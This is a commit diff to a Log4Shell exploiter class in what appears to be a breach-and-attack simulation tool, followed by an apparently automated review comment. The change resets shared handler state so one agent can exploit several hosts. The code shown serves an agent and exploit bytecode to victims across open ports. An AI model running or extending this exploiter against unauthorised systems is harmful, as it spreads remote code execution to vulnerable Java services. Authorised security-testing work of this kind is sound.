Agent: fix a bug in log4shell

Fix a bug that prevents a single agent from exploiting multiple machines. The fix resets the state of the global HTTPHandler params.
vakarisz 2022-01-06 16:58:40 +02:00
parent a38536b59b
commit 7ba2051bf6
1 changed files with 11 additions and 6 deletions


@ -50,13 +50,10 @@ class Log4ShellExploiter(WebRCE):
def _exploit_host(self): def _exploit_host(self):
self.start_servers() self.start_servers()
try: try:
self.exploit(None, None) return self.exploit(None, None)
finally: finally:
self.stop_servers() self.stop_servers()
# If java class was downloaded it means that victim is vulnerable
return Log4ShellExploiter.HTTPHandler.class_downloaded
def start_servers(self): def start_servers(self):
# Start http server, to serve agent to victims # Start http server, to serve agent to victims
paths = self.get_monkey_paths() paths = self.get_monkey_paths()
@ -140,7 +137,7 @@ class Log4ShellExploiter(WebRCE):
else: else:
return build_exploit_bytecode(exploit_command, WINDOWS_EXPLOIT_TEMPLATE_PATH) return build_exploit_bytecode(exploit_command, WINDOWS_EXPLOIT_TEMPLATE_PATH)
def exploit(self, url, command): def exploit(self, url, command) -> bool:
# Try to exploit all services, # Try to exploit all services,
# because we don't know which services are running and on which ports # because we don't know which services are running and on which ports
open_ports = [ open_ports = [
@ -158,7 +155,8 @@ class Log4ShellExploiter(WebRCE):
"service_name": exploit.service_name, "service_name": exploit.service_name,
"port": port, "port": port,
} }
return return True
return False
class HTTPHandler(http.server.BaseHTTPRequestHandler): class HTTPHandler(http.server.BaseHTTPRequestHandler):
@ -166,6 +164,11 @@ class Log4ShellExploiter(WebRCE):
class_downloaded = False class_downloaded = False
stop = False stop = False
@staticmethod
def reset():
Log4ShellExploiter.HTTPHandler.class_downloaded = False
Log4ShellExploiter.HTTPHandler.stop = False
def do_GET(self): def do_GET(self):
Log4ShellExploiter.HTTPHandler.class_downloaded = True Log4ShellExploiter.HTTPHandler.class_downloaded = True
logger.info("Java class servergot a GET request!") logger.info("Java class servergot a GET request!")
@ -185,6 +188,8 @@ class Log4ShellExploiter(WebRCE):
): ):
server.handle_request() server.handle_request()
Log4ShellExploiter.HTTPHandler.reset()
def get_java_class_server_thread(self, ip: str, java_class: bytes): def get_java_class_server_thread(self, ip: str, java_class: bytes):
Log4ShellExploiter.HTTPHandler.java_class = java_class Log4ShellExploiter.HTTPHandler.java_class = java_class
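Review bot: The `Log4ShellExploiter.HTTPHandler.reset()` call added after the `server.handle_request()` loop runs only when that loop exits normally, so an exception inside the loop would leave `class_downloaded` and `stop` set for the next host and that host's result could be reported wrongly. Wrapping the loop as `try: ... finally: Log4ShellExploiter.HTTPHandler.reset()` would clear the flags on every exit path. Both flags are class attributes and therefore shared by every `Log4ShellExploiter` in the process; a short comment on `reset()` such as `# Class-level flags are shared across exploiter instances; clear them between hosts` would make that explicit. The method containing the loop starts outside the hunk, so its thread handling is not visible here.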